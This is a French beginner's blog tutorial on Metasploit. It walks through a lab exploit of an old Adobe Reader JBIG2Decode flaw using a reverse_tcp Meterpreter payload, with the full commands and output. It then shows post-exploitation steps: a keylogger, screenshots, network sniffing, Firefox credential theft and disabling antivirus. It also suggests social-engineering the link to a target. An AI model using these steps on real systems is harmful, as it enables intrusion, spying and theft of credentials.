Apprendre à utiliser Metasploit: guide pour les débutants

metasploit meterpreter
metasploit meterpreter

Dernière mise à jour : 16 octobre 2023

Vous avez toujours voulu apprendre à utiliser Metasploit mais ne savez pas par où commencer ? Ne cherchez plus! Dans cet article, nous allons vous guider pas à pas pour découvrir les fonctionnalités de Metasploit et vous montrer comment utiliser cet outil puissant pour tester la sécurité de vos systèmes.

Que vous soyez débutant ou expérimenté en matière de sécurité informatique, cet article est fait pour vous ! Préparez-vous à devenir un expert en utilisation de Metasploit en un rien de temps.

Qu’est-ce que le framework Metasploit

Imaginez pouvoir entrer dans n’importe quel système informatique du monde entier, cela semble-t-il irréalisable ? Eh bien, c’est là que le framework Metasploit entre en jeu.

Metasploit est un outil incroyablement puissant qui vous permet d’exploiter les vulnérabilités de sécurité des systèmes informatiques. Il est utilisé par les professionnels de la sécurité pour tester la sécurité de leurs propres systèmes, mais également par les pirates informatiques pour pénétrer dans les systèmes d’autres personnes.

 

Il contient une grande base de données de modules d’exploitation, de payloads et de scripts de post-exploitation qui peuvent être utilisés pour automatiser les tests de sécurité.

Avec Metasploit, vous pouvez effectuer des tests de pénétration sur vos propres systèmes pour découvrir les vulnérabilités avant qu’un pirate informatique ne le fasse.

En quelques mots, Metasploit est un outil incontournable pour toute personne s’intéressant à la sécurité informatique, il vous donne les moyens de devenir un hacker éthique et de protéger efficacement vos systèmes.

Qu’est ce qu’on peut faire avec Metasploit

Le Framework permet de faire énormément de chose comme :

  • Scanner et collecter des informations sur une machine cible.
  • Détecter et exploiter les vulnérabilités.
  • Augmenter les privilèges d’un systèmes d’exploitation.
  • Installez une porte dérobée pour maintenir un accès persistant.
  • Utiliser la technique de « Fuzzing » pour tester la robustesse d’un logiciel.
  • Utiliser des outils d’évasion pour contourner les logiciels de sécurité.
  • Utiliser des payloads pour exécuter des commandes à distance sur les systèmes compromis.
  • Utiliser des outils de pivot pour propager l’accès à d’autres systèmes connectés.
  • Effacer les traces et les journaux pour dissimuler les activités malveillantes.

Principaux composants du framework Metasploit

Le framework Metasploit est un outil incroyablement puissant, mais pour en tirer le meilleur parti, il est important de comprendre les différents composants qui le composent.

Voici quelques-uns des principaux éléments de Metasploit qui vous aideront à comprendre comment cet outil fonctionne :

  • MSFconsole : C’est l’interface principale de Metasploit, c’est là que vous pouvez lancer des commandes et interagir avec les différents modules. Il est l’endroit ou vous allez passer la plupart de votre temps lorsque vous travaillez avec Metasploit.
  • Modules d’exploitation : Ce sont les modules qui vous permettent d’exploiter les vulnérabilités découvertes dans les systèmes cibles. Il existe des modules pour les vulnérabilités de Windows, Linux, et de nombreux autres systèmes d’exploitation.
  • Payloads : Les payloads sont des morceaux de code qui sont exécutés sur les systèmes compromis pour effectuer des tâches spécifiques, comme l’exécution de commandes à distance, l’installation d’une porte dérobée, etc.
  • Modules de post-exploitation : Ces modules vous permettent de collecter des informations sur les systèmes compromis, de maintenir un accès persistant, de contourner les protections de sécurité, etc.
  • Modules d’auxiliaires : Ces modules sont utilisés pour des tâches spécifiques, commes scanner les ports et récupérer des informations sur les cibles.
  • Modules de scripts : Ces modules vous permettent de lancer des scripts pour automatiser des tâches spécifiques, comme l’exportation de données, la création de rapports, etc.

En comprenant ces composants clés, vous serez en mesure de tirer le meilleur parti de Metasploit pour tester la sécurité de vos systèmes.

Commandes de base pour utiliser Metasploit ?

On passe maintenant à la partie la plus passionnante : l’utilisation de Metasploit.

Voici les étapes de base pour exploiter un système avec Metasploit :

  1. Collecter des informations sur la cible, telles que la version du système d’exploitation et les services réseau installés. Ces informations peuvent être récupérées à l’aide d’outils de scan de ports et de footprinting tels que Nmap, Maltego et Nessus.
  2. Choisir et configurer un exploit approprié en fonction des informations recueillies.
  3. Vérifier si le système cible est sensible à l’exploit choisi en utilisant des commandes de vérification.
  4. Choisir et configurer un payload approprié.
  5. Exécuter l’exploit avec les paramètres configurés pour tenter d’exploiter la vulnérabilité.

Coté Exploit

Les commandes que nous allons voir, dans la section qui suit sont utilisées pour sélectionner et configurer un exploit pour une cible spécifique avant de l’exécuter.

Il est important de comprendre les options de chaque exploit et de les configurer de manière appropriée pour maximiser les chances de succès de l’exploitation.

Voici les commandes de base pour utiliser les exploits de Metasploit :

  • Afficher tous les exploits disponibles : show exploits
  • Rechercher un exploit spécifique : search nom_exploit
  • Sélectionner un exploit : use nom_exploit
  • Obtenir des informations sur un exploit : info nom_exploit
  • Voir les options d’un exploit : show options

Coté Payload

Les payloads sont utilisés pour définir ce que l’exploit va faire une fois qu’il a réussi. Il existe de nombreux types de payloads, allant de la simple exécution de commandes à l’installation d’un shell à distance. Il est important de choisir le payload approprié pour chaque situation et de le configurer correctement pour maximiser les chances de succès de l’exploitation.

Voici comment utiliser les payloads de Metasploit :

  • Afficher tous les payloads disponibles : show payloads
  • Sélectionner un payload spécifique : set PAYLOAD nom_payload
  • Voir les options d’un payload pour une configuration : show options

En général

  • Obtenir de l’aide : help
  • Connaître la version de Metasploit : version
  • Lister l’intégralité des exploits, modules, playloads : search
  • Quitter Metasploit : quit

Installer et utiliser de Metasploit

Vous êtes prêt à tester vos compétences en sécurité informatique? Alors, écoutez bien!

Pour configurer un environnement de test digne de ce nom, vous devez télécharger et installer virtuellement Kali Linux avec Vmware. Et devinez quoi ? Metasploit est déjà pré-installé pour votre plus grand plaisir.

Ensuite, téléchargez et installez Windows XP pour créer une deuxième machine virtuelle sur laquelle vous pourrez expérimenter.

Mais ce n’est pas tout! Dans cette deuxième machine, nous allons installer une version vulnérable de l’application Adobe Acrobat Reader. Oui, vous avez bien entendu, vulnérable!

Cette vulnérabilité concerne Adobe Reader v9.0.0 (Windows XP SP3) et Adobe Reader v8.1.2 (Windows XP SP2). Et attention, car dans certains cas, l’ouverture d’un fichier PDF avec Adobe Acrobat Reader peut provoquer un « Buffer overflow » et permettre ainsi à une personne malveillante de prendre le contrôle d’une machine à distance.

Une fois que vous avez installé vos outils de test, lancez votre console Metasploit et montrez-nous de quoi vous êtes capable! Et n’oubliez pas, l’apprentissage est amusant quand il est passionnant!

Exploiter la faille Adobe Acrobat Reader avec Metasploit

Charger le Payload

Vous êtes prêt à vous lancer dans l’univers de Metasploit ? Alors, suivez ces étapes simples pour commencer votre aventure!

Pour démarrer, ouvrez msfconsole.

  • Cliquez sur Applications.
  • Puis, sélectionnez Outils d’exploitation.
  • Enfin, cliquez sur Metasploit Framework.

Sinon, utilisez la commande « msfconsole » dans un terminal.

 

En quelques secondes, une console s’affichera devant vous.

Maintenant, tapez les commandes suivantes:

search adobe_jbig2decode //chercher l’exploit adobe
use exploit/windows/browser/adobe_jbig2decode // sélectionner l’exploit
info exploit/windows/browser/adobe_jbig2decode
show options
set SRVHOST 192.168.64.5 // l’adresse IP du serveur utilisé
set SRVPORT 80
set URIPATH /   //c’est l’URL utilisé pour l’exploit
show targets
set targets 0
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.64.5

Ici, nous utilisons un « payload » appelé « reverse_tcp ». Cela signifie que nous envoyons un bout de code qui sera exécuté sur la machine cible une fois que nous avons utilisé une faille de sécurité. Cela va nous permettre de nous connecter à distance à la machine cible, même si elle est protégée par un pare-feu.

Remarque :  Dans ce cas, l’adresse IP 192.168.230.128 est l’adresse de notre machine virtuelle qui contient le serveur qui stockera le fichier PDF infecté. Cela signifie que nous allons utiliser cette adresse IP pour accéder à ce serveur virtuel et télécharger le fichier PDF infecté pour effectuer nos tests de sécurité.

Lancer l’exploit

Le module est correctement configuré, on peut lancer l’attaque avec la commande suivante :

msf > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.230.128:4444
[*] Using URL: http://192.168.64.5:8080/
[*] Server started.

Pour mettre en place notre test de sécurité, nous allons démarrer un serveur web temporaire à l’aide de l’adresse IP 192.168.64.5.

Notre serveur web temporaire est alors démarré avec l’adresse IP suivante : 192.168.64.5.

Le prochain étape est d’utiliser la technique dite d’ingénierie sociale pour envoyer cette adresse à une personne cible. Lorsque cette personne cliquera sur le lien, un fichier PDF malveillant lui sera proposé en téléchargement. Si la personne accepte de l’ouvrir avec Adobe Reader, Metasploit vous indiquera que l’exploitation de la vulnérabilité a réussi.

Il est important de noter que l’adresse IP 192.168.230.1 est celle de notre deuxième machine virtuelle sous Windows XP qui est configurée pour être vulnérable. C’est sur cette machine que nous avons installé une version vulnérable d’Adobe Acrobat Reader pour effectuer nos tests de sécurité.

Comme ceci est un test, nous allons télécharger le fichier PDF malveillant avec notre propre compte.

Ouvrir une session Meterpteter

Il ne nous reste plus qu’à ouvrir une session Meterpreter à distance sur la machine vulnérable :

msf > sessions -i 1
[*] Starting interaction with 1…

Nous avons désormais le contrôle total de la deuxième machine. Ensuite, nous pouvons faire ce que nous voulons.

Par exemple, nous pouvons faire des captures d’écran à distance en utilisant l’extension Espia de Meterpreter :

meterpreter > use espia
Loading extension espia…success.
screenshot hack.jpg Ou démarrer un keylogger afin de capturer tout ce qui est saisi au clavier :
keyscan_start
keyscan_dump
keyscan_stop

Ou espionner le réseau de la victime :

use sniffer
sniffer_interfaces //les interfaces disponibles
sniffer_start 2 //On lance la capture sur l’interface 2
sniffer_stats 2  //Savoir combien de paquet capturé
sniffer_dump 2 nom_fichier
// récupérer les paquets capturés

Ou encore ouvrir une boîte de dialogue invite de commande  :

meterpreter > shell
Process 892 created.
Channel 1 created.
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and Settings\admin\Mes documents>

Quelques commandes Meterpreter

  • run enum_firefox: cette commande permet de récupérer toues les informations liées à Firefox (cookies, historique, mot de passe enregistré).
  • run get_application_list:  cette commande sert pour connaitre les applications installées sur le poste de la victime.
  • run killav: désactive l’antivirus.
  • run kitrap0cd: automatise l’élévation de privilège.

Il existe une centaine de commande Meterpreter qui peuvent s’avérer très utiles…
Bien entendu, la méthode décrite ci-dessous peut-être utilisée pour d’autres failles touchant des différentes logiciels. Il est possible de lister l’ensemble des exploits connus avec la commande suivante : Show exploits

Vous  pouvez faire un autre test avec une vulnérabilité plus récente, c’est la faille Zero Day sur Internet Explorer.
Voici toute l’explication dans ce billet: Comment exploiter la faille 0day d’Internet Explorer avec Metasploit.

Conclusion

Vous venez de découvrir l’incroyable potentiel de Metasploit ! Ce n’est pas seulement un outil pour exploiter les failles d’Adobe ou d’Internet Explorer, mais il y a des centaines d’exploits disponibles pour attaquer tout type de machines.

Metasploit est un outil puissant qui continue d’évoluer et de surprendre les professionnels de la sécurité informatique. Nous espérons que, grâce à ce guide informatique, vous avez pu maîtriser les commandes de base de ce Framework incroyable.

Et si vous voulez en savoir plus sur Metasploit ou avez des idées pour améliorer cette page, n’hésitez pas à laisser un commentaire ! Nous sommes toujours ravis d’entendre vos avis et de vous aider à mieux maitriser les outils informatique.